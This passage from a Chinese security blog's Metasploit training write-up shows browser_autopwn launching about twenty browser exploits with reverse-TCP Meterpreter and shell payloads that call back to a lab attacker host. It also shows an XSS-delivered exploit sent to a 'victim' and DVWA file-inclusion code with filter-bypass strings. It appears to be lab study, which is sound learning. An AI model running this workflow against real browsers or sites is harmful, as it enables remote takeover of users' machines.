[*] Using URL: http://10.10.10.128:8080/btZYRTHW
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/MtrrbGqvxBGp
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/gqnIrlsGGGL
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/qjoHtDYsUA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VTRsYvyICuI
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/nscgcOF
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/gcErPNn
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/nozikgfm
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/doNKZzOvFhj
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hyVgsOceIkWv
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/qDXS
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/Zxijin
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 10.10.10.128:3333 
[*] Using URL: http://10.10.10.128:8080/aaeoheX
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 10.10.10.128:6666 
[*] Started reverse TCP handler on 10.10.10.128:7777 

[*] --- Done, found 20 exploit modules    # 共20个可用于攻击的模块

[*] Using URL: http://10.10.10.128:8080/P8ZELlXN4
[*] Server started.

# 查看它们
msf5 auxiliary(server/browser_autopwn) > jobs

Jobs
====

  Id  Name                                                       Payload                          Payload opts
  --  ----                                                       -------                          ------------
  0   Auxiliary: server/browser_autopwn                                                           
  1   Exploit: android/browser/webview_addjavascriptinterface    android/meterpreter/reverse_tcp  tcp://10.10.10.128:8888
  2   Exploit: multi/browser/firefox_proto_crmfrequest           generic/shell_reverse_tcp        tcp://10.10.10.128:6666
  3   Exploit: multi/browser/firefox_tostring_console_injection  generic/shell_reverse_tcp        tcp://10.10.10.128:6666
  4   Exploit: multi/browser/firefox_webidl_injection            generic/shell_reverse_tcp        tcp://10.10.10.128:6666
  5   Exploit: multi/browser/java_atomicreferencearray           java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777
  6   Exploit: multi/browser/java_jre17_jmxbean                  java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777
  7   Exploit: multi/browser/java_jre17_provider_skeleton        java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777
  8   Exploit: multi/browser/java_jre17_reflection_types         java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777
  9   Exploit: multi/browser/java_rhino                          java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777
  10  Exploit: multi/browser/java_verifier_field_access          java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777
  11  Exploit: multi/browser/opera_configoverwrite               generic/shell_reverse_tcp        tcp://10.10.10.128:6666
  12  Exploit: windows/browser/adobe_flash_mp4_cprt              windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  13  Exploit: windows/browser/adobe_flash_rtmp                  windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  14  Exploit: windows/browser/ie_cgenericelement_uaf            windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  15  Exploit: windows/browser/ie_createobject                   windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  16  Exploit: windows/browser/ie_execcommand_uaf                windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  17  Exploit: windows/browser/mozilla_nstreerange               windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  18  Exploit: windows/browser/ms13_080_cdisplaypointer          windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  19  Exploit: windows/browser/ms13_090_cardspacesigninhelper    windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  20  Exploit: windows/browser/msxml_get_definition_code_exec    windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  21  Exploit: multi/handler                                     windows/meterpreter/reverse_tcp  tcp://10.10.10.128:3333
  22  Exploit: multi/handler                                     generic/shell_reverse_tcp        tcp://10.10.10.128:6666
  23  Exploit: multi/handler                                     java/meterpreter/reverse_tcp     tcp://10.10.10.128:7777

# 使用第15个来进行攻击
msf5 auxiliary(server/browser_autopwn) > xssf_exploit 1 15
[*] Searching Metasploit launched module with JobID = '15'...
[+] A running exploit exists: 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[1] (1)] 

[*] 10.10.10.128     ie_createobject - Sending exploit HTML...

[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '1'
[+] Remaining victims to attack: NONE

之后就会将我们想要展示给对方的信息(auxiliary/xssf/public/misc/alert)展示在对方的客户机上（这里不知道为什么没有显示出内容，只有框）：

只要有客户机查看了这个博客，并且点击了这个链接，就会有机会控制他们的机器。　　

文件包含和文件上传漏洞

文件包含(Local File Include)和文件上传(Remote File Inclusion)是文件包含攻击的两种形式。

本地文件包含就是通过浏览器来引入web服务器上的文件，原因是因为在浏览器包含文件是没有做好过滤工作。

这里举三个简单例子，均来自DVWA。

# low
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?> 
# 这个连过滤都没有，可以使用`../`跳到上一级目录来多次尝试，判断其目录结构

# medium
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?> 
# 这个过滤了http://和https://来避免远程文件包含，以及过滤了`../`来避免跳目录
# 缺点是这种方法只能过滤一次，如果这么写就没用了(htthttp://p://)or(....//)

# high
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?> 
# 使用了fnmatch函数来指定包含的文件名必须用file开头
# 文件读取协议中就有file:///协议，用于读取本地文件，使用该协议亦能包含

# impossible
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?> 
# 这个就没辙了，使用了白名单的形式，杜绝了文件包含

文件上传原理类似，也是因为对文件类型的过滤不到位，导致了可以植入木马脚本等操作。

原文作者：f10@t

原文链接：https://lzwgiter.github.io/posts/79017d0.html

发表日期：February 7th 2019, 1:58:13 pm

更新日期：July 6th 2023, 8:24:18 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Metasploit渗透测试魔鬼训练营-Windows服务漏洞MS08-067实战与分析总结
• Previous Post
  Metasploit渗透测试魔鬼训练营-服务扫描与查点

Powered by Hexotheme Archer

做客的小伙伴数:

CATALOG

1. 1. 基于Metasploit渗透测试框架的web应用渗透技术
   1. 1.1. 辅助模块
   2. 1.2. 渗透模块
2. 2. Web应用漏洞扫描探测
   1. 2.1. 扫描器
   2. 2.2. SQL注入探测
   3. 2.3. XSS漏洞探测
   4. 2.4. Web应用渗透测试
      1. 2.4.1. SQL注入示例
      2. 2.4.2. XSS跨站攻击实例
         1. 2.4.2.1. 使用Metasploit
      3. 2.4.3. 文件包含和文件上传漏洞

• Archive
• Tag
• Cate

Total : 97



2024

• 02/06 学鲁菜之酱焖鲈鱼

2023

• 10/22 Spring AOP再探
• 10/09 重新审视微服务
• 10/04 K8s攻防之OWASP-K8S-TOP10（下）
• 09/16 K8s攻防之OWASP-K8S-TOP10（上）
• 08/08 Java内存马原理（一）
• 07/08 Java Instrument机制及管窥IAST
• 07/03 gRPC简介与使用
• 04/30 fastjson反序列化漏洞学习（二）
• 01/07 Netty框架学习
• 01/04 Java网络编程模型复习

2022

• 04/26 python-Numpy库使用
• 01/20 MATLAB - Wireless Communication Onramp
• 01/19 Matlab编程基础

2021

• 10/04 Bloom Filter概念原理
• 08/25 zk-SNARKs简洁的非交互式零知识证明学习(一)
• 08/22 Quarkus学习（一）概述以及编写REST服务
• 08/19 Cloud Programming Simplified:A Berkeley View on Serverless Computing
• 08/18 闲聊一下Java中的DI和CDI
• 08/12 Kubernetes-集群环境搭建使用及问题记录（三）
• 08/09 Kubernetes-集群环境搭建使用及问题记录（二）
• 08/03 Kubernetes 集群环境搭建使用及问题记录（一）
• 07/24 闲聊一下Go语言的函数方法和多态机制特点
• 07/14 express学习（一）-基于NodeJS的Web框架
• 07/10 Beego学习-ORM
• 07/06 Beego学习-路由设置
• 07/06 docker-compose及dockerfile总结
• 05/09 Spring安全技术-Spring Security使用及总结（一）
• 04/28 DevOps技术-简单了解与入门
• 01/23 Spring持久层技术-Sping Data JPA使用及总结（一）
• 01/14 以太坊智能合约开发环境搭建及智能合约的编写、部署、测试
• 01/11 以太坊基本概念与实验环境搭建

2020

• 06/17 DC-1靶机渗透
• 05/31 fastjson反序列化漏洞学习（一）
• 05/09 Spring基础学习 - AOP机制
• 05/06 JavaEE基础 - Servlet
• 05/06 Spring基础学习 - IOC机制
• 05/01 微服务入门-5W和微服务思想
• 04/22 Java 反序列化漏洞与JNDI注入(下)
• 04/14 Kerberos认证过程原理及攻击手段
• 02/26 内存布局与栈溢出&堆溢出原理
• 02/21 入坑Pwn之刷题补坑
• 01/29 内存取证原理学习及Volatility - 篇二
• 01/22 Struts框架管窥以及几个漏洞的分析
• 01/09 Redis未授权访问漏洞及修补方法
• 01/08 本地提权与漏洞提权

2019

• 12/21 逆向工程课程小结
• 12/08 内存取证原理学习及Volatility - 篇一
• 10/20 并发模型之单线程多路I/O复用---select
• 09/29 入坑Pwn之基本知识
• 09/10 Apache-Commons-Collections反序列化漏洞
• 09/03 Java 反序列化漏洞与JNDI注入(上)
• 08/20 记录一次对win2k3 Enterprise Edition的永恒之蓝利用
• 05/11 kali-渗透测试-信息收集3
• 05/10 kali-渗透测试-信息收集2
• 03/18 kali-渗透测试-信息收集1
• 02/11 Metasploit渗透测试魔鬼训练营-客户端渗透攻击
• 02/10 Metasploit渗透测试魔鬼训练营-Windows服务漏洞MS08-067实战与分析总结
• 02/07 Metasploit渗透测试魔鬼训练营-web应用渗透
• 02/06 Metasploit渗透测试魔鬼训练营-服务扫描与查点
• 02/04 Metasploit渗透测试魔鬼训练营-信息收集
• 01/22 Metasploit渗透测试魔鬼训练营 第一天

2018

• 12/28 小明的博客--Typecho 反序列化漏洞
• 12/10 Bugku的一道注入---多次
• 12/06 Bugku的一道注入--INSERT INTO注入
• 11/26 ThinkPHP框架学习---路由
• 11/25 ThinkPHP框架学习---config类和config助手函数
• 11/25 ThinkPHP框架学习---框架目录及框架配置
• 11/19 Nmap使用指南
• 11/12 SQL注入小记(二)
• 11/09 PHP学习--超级全局变量
• 11/08 PHP学习--变量
• 11/03 PHP框架MVC学习
• 10/30 CTF中的python脚本题小结（二）
• 10/30 CTF中的python脚本题小结（一）
• 10/20 Hackergame 2018 wp
• 09/25 安恒九月题的misc和一道web
• 09/10 SQL注入小记(一)
• 08/27 隐写术-LSB隐写
• 08/26 隐写术--NTFS流隐写
• 08/25 CTF常见隐写手段小结
• 08/22 DOM 文档对象模型
• 08/21 BOM-浏览器操作对象模型之history和screen对象
• 08/20 BOM 浏览器操作对象模型之navigator、location对象
• 08/18 BOM-浏览器操作对象模型之window对象
• 08/16 Javascript基础之数据类型2
• 08/15 Javascript基础之数据类型1
• 08/12 CTF隐写术--关于ZIP
• 08/09 CSS样式基础4.4--选择器之伪类选择器
• 08/08 Bugku的一道misc-----猫片
• 08/08 CSS基础4.3--选择器之属性选择器
• 08/05 CSS基础4.2--选择器之组合选择器
• 08/03 CSS基础4.1--选择器之CSS基础4.1-选择器之基本选择器
• 08/02 CSS基础3.2--特性之CSS基础3.2--特性之继承性
• 08/01 CSS基础3.1--特性之CSS基础3.1-特性之层叠性
• 08/01 CSS基础2--CSS基础2-应用
• 08/01 CSS基础1--样式

 Java  开发技术  区块链技术  渗透测试  漏洞分析  web安全  前端  Go语言  Go Web  论文阅读  CTF  SQL注入  CSS  隐写术  python  云技术  DevOps  开发与运维  DevSecOps  网络编程  Kubernete  云安全  分布式技术  MatLab  PHP  Spring  Quarkus  docker  NodeJS  express  微服务技术  以太坊  密码学  智能合约  电子取证  pwn  C编程  课程总结  日常



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

 开发技术  区块链技术  漏洞分析  论文阅读  CTF  渗透测试  DevSecOps  云安全  MATLAB  密码学  电子取证  课程总结  杂谈



